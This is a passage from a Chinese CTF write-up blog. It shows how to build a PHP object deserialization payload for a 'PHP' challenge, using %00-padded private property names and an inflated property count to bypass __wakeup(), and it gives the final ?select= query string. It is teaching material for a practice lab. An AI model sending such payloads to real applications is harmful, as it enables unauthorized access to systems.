<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class Name&#123;</span><br><span class="line">    private $username &#x3D; &#39;admin&#39;;</span><br><span class="line">    private $password &#x3D; &#39;100&#39;;</span><br><span class="line">&#125;</span><br><span class="line">    $a &#x3D; new Name();</span><br><span class="line">	$b &#x3D; serialize($a);</span><br><span class="line">	print_r($b);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>得到:<code>O:4:&quot;Name&quot;:2:&#123;s:14:&quot;Nameusername&quot;;s:5:&quot;admin&quot;;s:14:&quot;Namepassword&quot;;i:100;&#125;</code>，但是还要注意username和password的属性，两者都是private属性，所以要在类名两边加上<code>%00</code></p>
<p><code>O:4:&quot;Name&quot;:2:&#123;s:14:&quot;%00Name%00username&quot;;s:5:&quot;admin&quot;;s:14:&quot;%00Name%00password&quot;;i:100;&#125;</code></p>
<p>private属性序列化的时候格式是%00类名%00成员名，protect属性序列化的时候格式是%00*%00成员名</p>
<p>但是如果直接构建payload:<code>?select=O:4:&quot;Name&quot;:2:&#123;s:14:&quot;%00Name%00username&quot;;s:5:&quot;admin&quot;;s:14:&quot;%00Name%00password&quot;;i:100;&#125;</code>是拿不到flag的，看了wp才知道是因为在<code>class.php</code>中<code>__wakeup()</code>被<code>username</code>覆盖了</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">__construct()当一个对象创建时被调用</span><br><span class="line"></span><br><span class="line">__destruct()当一个对象销毁时被调用</span><br><span class="line"></span><br><span class="line">__toString()当反序列化后的对象被输出的时候(转化为字符串的时候)被调用</span><br><span class="line"></span><br><span class="line">__sleep() 在对象在被序列化之前运行</span><br><span class="line"></span><br><span class="line">__wakeup将在序列化之后立即被调用</span><br></pre></td></tr></table></figure>

<p>所以需要跳过<code>__wakeup()</code>，当反序列化时，若属性个数大于真实属性个数时，则会跳过<code>__wakeup()</code>，所以:</p>
<p><code>?select=O:4:&quot;Name&quot;:3:&#123;s:14:&quot;%00Name%00username&quot;;s:5:&quot;admin&quot;;s:14:&quot;%00Name%00password&quot;;i:100;&#125;</code></p>
<p>wakeup()是用在反序列化操作中。unserialize()会检查存在一个wakeup()方法。如果存在，则先会调用__wakeup()方法。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/26/article-title-25/" rel="prev" title="i春秋">
      <i class="fa fa-chevron-left"></i> i春秋
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#WarmUp"><span class="nav-number">1.</span> <span class="nav-text">WarmUp</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%9A%8F%E4%BE%BF%E6%B3%A8"><span class="nav-number">2.</span> <span class="nav-text">随便注</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#EasySql"><span class="nav-number">3.</span> <span class="nav-text">EasySql</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Include"><span class="nav-number">4.</span> <span class="nav-text">Include</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Secret-File"><span class="nav-number">5.</span> <span class="nav-text">Secret File</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Exec"><span class="nav-number">6.</span> <span class="nav-text">Exec</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Ping-Ping-Ping"><span class="nav-number">7.</span> <span class="nav-text">Ping Ping Ping</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#easy-calc"><span class="nav-number">8.</span> <span class="nav-text">easy calc</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#php%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%A7%A3%E6%9E%90%E7%89%B9%E6%80%A7%E7%BB%95%E8%BF%87WAF"><span class="nav-number">8.1.</span> <span class="nav-text">php字符串解析特性绕过WAF</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#http"><span class="nav-number">9.</span> <span class="nav-text">http</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#PHP"><span class="nav-number">10.</span> <span class="nav-text">PHP</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Yanghaoxuan</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yanghaoxuan</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
